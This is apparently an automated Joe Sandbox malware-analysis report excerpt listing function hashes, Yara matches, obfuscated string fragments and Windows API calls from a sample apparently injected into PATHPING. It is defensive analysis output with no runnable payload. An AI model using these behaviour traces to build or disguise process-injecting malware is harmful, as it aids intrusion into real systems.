                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d51cfc5dfc2561f51f77a6a56745b418c067be914514ca88d1040e21cba96d0d
                                                                                                                        • Instruction ID: 15d2eaaa1f4ccff24548fadca8fcadb86b6588a593be08e54540e1fe2a5d5eb3
                                                                                                                        • Opcode Fuzzy Hash: d51cfc5dfc2561f51f77a6a56745b418c067be914514ca88d1040e21cba96d0d
                                                                                                                        • Instruction Fuzzy Hash: 0BF0B4736202125BD720DE5DECC4B9AF79CEB84334F140122F998CB351D672D4D587A0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4a294e9bbd7cd18622ef583e3dde76e6d49726dbffdc308a69a4ca2b3d55d71f
                                                                                                                        • Instruction ID: cd624192158945fffe91768eb4af9322c3dec3ef5e406fe90b303ce54112caf7
                                                                                                                        • Opcode Fuzzy Hash: 4a294e9bbd7cd18622ef583e3dde76e6d49726dbffdc308a69a4ca2b3d55d71f
                                                                                                                        • Instruction Fuzzy Hash: FFF01CBA2106187BD714EFA9DC45EDB77ADEFC9750F004019BA18A7241D670F9218BB4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7fed1a80514c6fa1db7863ae72c74f853bda333c2cdb1dfbf31e523ce395b631
                                                                                                                        • Instruction ID: d79ad3bcc95d9b4eafa2a7e28e7f8a58077dbf28308698651dde6cd74fea8e7e
                                                                                                                        • Opcode Fuzzy Hash: 7fed1a80514c6fa1db7863ae72c74f853bda333c2cdb1dfbf31e523ce395b631
                                                                                                                        • Instruction Fuzzy Hash: ECF082B1815209EBDB14CFA4D881BDEBBB8EF04320F1083ADE8259B280D63597908781
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 91884bb2f0ac8af9a4aa6ea0de853ea0b7eac79e40581915d80249b308c900df
                                                                                                                        • Instruction ID: bc048e14b3bb03f9d67625e99e6557bbbd98118a4a1d8195064453a611ebc990
                                                                                                                        • Opcode Fuzzy Hash: 91884bb2f0ac8af9a4aa6ea0de853ea0b7eac79e40581915d80249b308c900df
                                                                                                                        • Instruction Fuzzy Hash: 98E06DB62103047BD614EE69EC44E9B37ACEF89750F004018FA08AB241D671B9108BB4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3b4b4e618b940305639aab7a69cecd77c9f8237aa11e509674f24fa6eb5e0e4a
                                                                                                                        • Instruction ID: ebf47b55a424c4a857b27a6aa400aca154f783ad5f410c87ee1d0a5dcb788e5c
                                                                                                                        • Opcode Fuzzy Hash: 3b4b4e618b940305639aab7a69cecd77c9f8237aa11e509674f24fa6eb5e0e4a
                                                                                                                        • Instruction Fuzzy Hash: 98E04F3661021437C220A59ADC55FA7F75CAFC5A60F094064FE08AB240E5B0B98082E8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4535a27cda2117cbc5823093b09212ee6cd9c8fd5f63c365e5771b904de907f5
                                                                                                                        • Instruction ID: a47fa2ca377224bdfcc8e86085a0e8b8956a8049e436b6a8fba82aae6a1a9bf4
                                                                                                                        • Opcode Fuzzy Hash: 4535a27cda2117cbc5823093b09212ee6cd9c8fd5f63c365e5771b904de907f5
                                                                                                                        • Instruction Fuzzy Hash: 57F06571925208EADB14CF64E481BEDBBB8EF49320F10837EE815DB240D23597908741
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c327015965e002ba6da806d7b35ba06a045db85dc36153716a3361cbcbb9684d
                                                                                                                        • Instruction ID: d4bae8aa3b947e436beb9b964d578c0aac5eef701d291f1ce73718a4ddfe97ba
                                                                                                                        • Opcode Fuzzy Hash: c327015965e002ba6da806d7b35ba06a045db85dc36153716a3361cbcbb9684d
                                                                                                                        • Instruction Fuzzy Hash: 7DE04F3A2102147BD510FA6AEC00F9B77ADEBC5760F004415FA096B141C671B90187B1
                                                                                                                        Strings
                                                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                                        • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                                        • String ID: >$'$P$Z$[$e$m$r$r$y$zt$'
                                                                                                                        • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                                        • API String ID: 0-685823316
                                                                                                                        • Opcode ID: f3bdde6a2960d8b2d6b1832c63901f495a2598d48b9056f9b582630838a40533
                                                                                                                        • Instruction ID: a5195f0d88b66364dda66820cb0166a705ac142a61bc0be600ff2c434469b784
                                                                                                                        • Opcode Fuzzy Hash: f3bdde6a2960d8b2d6b1832c63901f495a2598d48b9056f9b582630838a40533
                                                                                                                        • Instruction Fuzzy Hash: 50317FB5D51318AEEF50DFA0DC85BEEBBB9BF48304F04814DE6087A181DBB55648CBA4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 2$8$8$<$Q$Z$j$w$y${
                                                                                                                        • API String ID: 0-1609194601
                                                                                                                        • Opcode ID: 5670b2ff8edca7e123c44925113381ad118cdca0ea7393fbc4525308d027c8c0
                                                                                                                        • Instruction ID: ce9841298fba4cad29145759278e06f4ca6b309cee5dbaf5e7a5ac4aa14eacd0
                                                                                                                        • Opcode Fuzzy Hash: 5670b2ff8edca7e123c44925113381ad118cdca0ea7393fbc4525308d027c8c0
                                                                                                                        • Instruction Fuzzy Hash: CA11DE10D1C7CADDDB12C7BC84087AEBF711F23254F4882D9D4A52A2D2C3794346C7A6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: F$P$T$f$r$x
                                                                                                                        • API String ID: 0-2523166886
                                                                                                                        • Opcode ID: 1c30bdc5fde3e8f0472f760cc94c7950708806720de4cfc276979ea33fa31ea4
                                                                                                                        • Instruction ID: 97a2f9570a3413333b0e4c2b65a472ff6d74000f725229395dd87126a62c0fdc
                                                                                                                        • Opcode Fuzzy Hash: 1c30bdc5fde3e8f0472f760cc94c7950708806720de4cfc276979ea33fa31ea4
                                                                                                                        • Instruction Fuzzy Hash: BC51BF71920316ABDB35EB64C848BEEF7F8BF04700F04462AA5895A180E7F4A6C4CBD1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $i$l$o$u
                                                                                                                        • API String ID: 0-2051669658
                                                                                                                        • Opcode ID: 596b9c2338c5aa19fe15adb76090d9a0577430f48cb4e8cf965ab357200c677b
                                                                                                                        • Instruction ID: 415d81f74e80e30348211e7deca7b8c6d6a26c49e85123573215ef054d55e285
                                                                                                                        • Opcode Fuzzy Hash: 596b9c2338c5aa19fe15adb76090d9a0577430f48cb4e8cf965ab357200c677b
                                                                                                                        • Instruction Fuzzy Hash: 37615FB2A10315AFCB24DBA4CC84FEFB7BDAF88700F14455DE55AA7240D774AA84CB60
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$k$o
                                                                                                                        • API String ID: 0-3624523832
                                                                                                                        • Opcode ID: 35f0e86a429a3ea162c65131b7b75882f9db462fbf7f1ab948eb224f7cf45ad0
                                                                                                                        • Instruction ID: 3b63bbad21bbd31d8af637f2d3fad9316fa3d07162788d304ee5ff70719599e8
                                                                                                                        • Opcode Fuzzy Hash: 35f0e86a429a3ea162c65131b7b75882f9db462fbf7f1ab948eb224f7cf45ad0
                                                                                                                        • Instruction Fuzzy Hash: C3B10F75A10309AFDB14DBA4CC85FEFB7FDAF88700F144558F65997240D674AA81CB50
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$h$o
                                                                                                                        • API String ID: 0-3662636641
                                                                                                                        • Opcode ID: 62246e0fc81170e2e9806cb755f420c6bc66478e872f5459a9c0ba6f24a22566
                                                                                                                        • Instruction ID: cea3cdc516f5b55980550e20a7e1158dd657e3702892a1aace0aa0cd11cf77df
                                                                                                                        • Opcode Fuzzy Hash: 62246e0fc81170e2e9806cb755f420c6bc66478e872f5459a9c0ba6f24a22566
                                                                                                                        • Instruction Fuzzy Hash: 758167B6C212186AEB65EB94CC85FEF737CFF48600F004599E509A6140EBB56BC48FA1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$k$o
                                                                                                                        • API String ID: 0-3624523832
                                                                                                                        • Opcode ID: ad6fe1e8ba111fa7cdca3036f1de9e314fc7c19b3f3eb5c86cdcaf353eb8ae8f
                                                                                                                        • Instruction ID: 2983634a8c4c699d591fefaeed84392cf06754011bdc3775dfb5124bb5352c6a
                                                                                                                        • Opcode Fuzzy Hash: ad6fe1e8ba111fa7cdca3036f1de9e314fc7c19b3f3eb5c86cdcaf353eb8ae8f
                                                                                                                        • Instruction Fuzzy Hash: E7612F75A00309AFDB14DFA4CC84FEFB7BDAF88700F104558E6599B244D774AA81CB60
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                                        • API String ID: 0-2877786613
                                                                                                                        • Opcode ID: d23459081a1b77cb3bcb806d0ae26695a53c59807d20048a140bd5cc22134986
                                                                                                                        • Instruction ID: abcd1e725b3a2b0538e30c103e4609519e6ad4c84d6205d417835445e3e4fc16
                                                                                                                        • Opcode Fuzzy Hash: d23459081a1b77cb3bcb806d0ae26695a53c59807d20048a140bd5cc22134986
                                                                                                                        • Instruction Fuzzy Hash: 214131B59212187FEB11FB95DC41FEF7B7CAF59600F004048F5086E180D7B4668587EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$h$o
                                                                                                                        • API String ID: 0-3662636641
                                                                                                                        • Opcode ID: 388ec3809b4e17d1440dd548c569d36164c997ec3c83155a3f6c483b33c1cb22
                                                                                                                        • Instruction ID: 41b4d08759df3f5cfa9f8a6af383c7f4c3e91212ffaa6c667611f618d1858c1b
                                                                                                                        • Opcode Fuzzy Hash: 388ec3809b4e17d1440dd548c569d36164c997ec3c83155a3f6c483b33c1cb22
                                                                                                                        • Instruction Fuzzy Hash: 66415375D11319AAEB60EBA4CC41FEEB3B8FF44700F005599E509A6140EBB467C48FA5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 6$7$9$I
                                                                                                                        • API String ID: 0-601985604
                                                                                                                        • Opcode ID: 2231109d5e3abfc73912a3eb4484205bc409a222c11b547e0a50759c92bedde0
                                                                                                                        • Instruction ID: ef5bb3893248ca49c7d3db8c1e0ee70c21181723645572f59299929ff7a9996b
                                                                                                                        • Opcode Fuzzy Hash: 2231109d5e3abfc73912a3eb4484205bc409a222c11b547e0a50759c92bedde0
                                                                                                                        • Instruction Fuzzy Hash: 863134B5D20219ABEF14DBA4DD41BFE77B8FF44304F004159E908AA240E6B5AA458BE5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$k$o
                                                                                                                        • API String ID: 0-3624523832
                                                                                                                        • Opcode ID: 7b73a00d15f568ac3a696cdcee3726f364015c8d92b3dc6e6ec06a31984cb485
                                                                                                                        • Instruction ID: 6f88ed272d8a9c8eec2835233347ecfa406ef6baa5334499c0503f2a4d3d43d2
                                                                                                                        • Opcode Fuzzy Hash: 7b73a00d15f568ac3a696cdcee3726f364015c8d92b3dc6e6ec06a31984cb485
                                                                                                                        • Instruction Fuzzy Hash: B501D8B2A102089FDB14DF94D880ADEF7B9FF08704F04465DD5056F201E7729485CBA0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fa0000_RprkEKYwQARXc.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $e$k$o
                                                                                                                        • API String ID: 0-3624523832
                                                                                                                        • Opcode ID: e32efa3a4eca2eea4d9327ceeb98b8bc21b700f1492f836d0d767139d68c2b7c
                                                                                                                        • Instruction ID: 361b041719748cacd80778f9de1841a77a5366a1d400dc768fd1c428242b65bc
                                                                                                                        • Opcode Fuzzy Hash: e32efa3a4eca2eea4d9327ceeb98b8bc21b700f1492f836d0d767139d68c2b7c
                                                                                                                        • Instruction Fuzzy Hash: 07A00226A04921A7D7184B54A461781F7E0FA416613100AD7C2D1C882DD2214040A7C1

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:2.5%
                                                                                                                        Dynamic/Decrypted Code Coverage:4.1%
                                                                                                                        Signature Coverage:2.2%
                                                                                                                        Total number of Nodes:461
                                                                                                                        Total number of Limit Nodes:76

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "$#$,$.$5 $61$@@$F$N$O$T$U$p$pr$q$s$xQ$|NF$#$'$S
                                                                                                                        • API String ID: 0-3021803578
                                                                                                                        • Opcode ID: 754f0cb54fcd78cffda4c783da919a90f3df321dca8da1cf13a93dbbad2473d3
                                                                                                                        • Instruction ID: dd1e882b5ded4813fb49aaf9493068782661675b8e4a83c62e34105d4bf88bc9
                                                                                                                        • Opcode Fuzzy Hash: 754f0cb54fcd78cffda4c783da919a90f3df321dca8da1cf13a93dbbad2473d3
                                                                                                                        • Instruction Fuzzy Hash: 8F02BFB0D08219CFEB24CF95C8A4BEDBBB5FB45308F2081D9C4596B281D7B56A88CF54
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 02BBC244
                                                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 02BBC27F
                                                                                                                        • FindClose.KERNELBASE(?), ref: 02BBC28A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3541575487-0
                                                                                                                        • Opcode ID: f574dcca9fe591d4dd08330b55f3ca42781a6a5cf25310e43f55454e88115543
                                                                                                                        • Instruction ID: 7330036e07d7ffc824dad6355846dbbac7a448b94d5caa5524abf298b7f6b5ea
                                                                                                                        • Opcode Fuzzy Hash: f574dcca9fe591d4dd08330b55f3ca42781a6a5cf25310e43f55454e88115543
                                                                                                                        • Instruction Fuzzy Hash: AF3152719102087FDB61DFA4CC85FFF777DEF44B44F14459AB958A6180EAB0AA848FA0
                                                                                                                        APIs
                                                                                                                        • NtCreateFile.NTDLL(?,?,?,5D33299C,?,?,?,?,?,?,?), ref: 02BC8CFE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 3a538545ac33b4e89461af44c7dd5fa6b640ccf2d02e9bd38c0d6b0058846378
                                                                                                                        • Instruction ID: e151afd70eb2beb1e6cf9d8d6be6bc846e06da28d71eb614aa8f13e19c2e5049
                                                                                                                        • Opcode Fuzzy Hash: 3a538545ac33b4e89461af44c7dd5fa6b640ccf2d02e9bd38c0d6b0058846378
                                                                                                                        • Instruction Fuzzy Hash: 9331B4B5A01248AFDB14DF99D880EEFBBB9AF88314F108149F919A7344D730A851CFA1
                                                                                                                        APIs
                                                                                                                        • NtReadFile.NTDLL(?,?,?,5D33299C,?,?,?,?,?), ref: 02BC8E59
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: 3f8db6c77631d86ce37d9d3fe5275efd892d8e28885a73c69f0e239a369adcbe
                                                                                                                        • Instruction ID: de4271dd230c1f611d23486c9972f1963c75b3b4f6c6557b8a8692faffb8e184
                                                                                                                        • Opcode Fuzzy Hash: 3f8db6c77631d86ce37d9d3fe5275efd892d8e28885a73c69f0e239a369adcbe
                                                                                                                        • Instruction Fuzzy Hash: D431E9B5A00208AFDB14DF99D881EEFB7B9EF88714F108149F918A7340D730A811CFA1
                                                                                                                        APIs
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(02BB199B,?,02BC7B1F,5D33299C,00000004,00003000,?,?,?,?,?,02BC7B1F,02BB199B,?,?,02BCAFA1), ref: 02BC915B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2167126740-0
                                                                                                                        • Opcode ID: 1409185346ce7a013563e4669413ced259aff9e196a2489ade36b6e6bc90393b
                                                                                                                        • Instruction ID: 4d9fe0fdce7db85aa32ddf2afc0d4838bb03571acaefb82d10838e3299545d0e
                                                                                                                        • Opcode Fuzzy Hash: 1409185346ce7a013563e4669413ced259aff9e196a2489ade36b6e6bc90393b
                                                                                                                        • Instruction Fuzzy Hash: A52124B5A00249AFDB10DF98D881EEFBBB9EF89710F108149F918A7240D770A8518FA1
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4033686569-0
                                                                                                                        • Opcode ID: 70c51c4d1c49d97d4bd7d0c6d274920f4979941384b9263865c7b785f2aa4232
                                                                                                                        • Instruction ID: 445dec3cd3c846c5dc213bc2faa413f12a9499e61ba11304deb0d4c15fe3e2ae
                                                                                                                        • Opcode Fuzzy Hash: 70c51c4d1c49d97d4bd7d0c6d274920f4979941384b9263865c7b785f2aa4232
                                                                                                                        • Instruction Fuzzy Hash: 56115171A00608BFD710EB69CC51FABB76DDF85714F50854DF918A7280DB7169058BA1
                                                                                                                        APIs
                                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02BC8F57
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmp
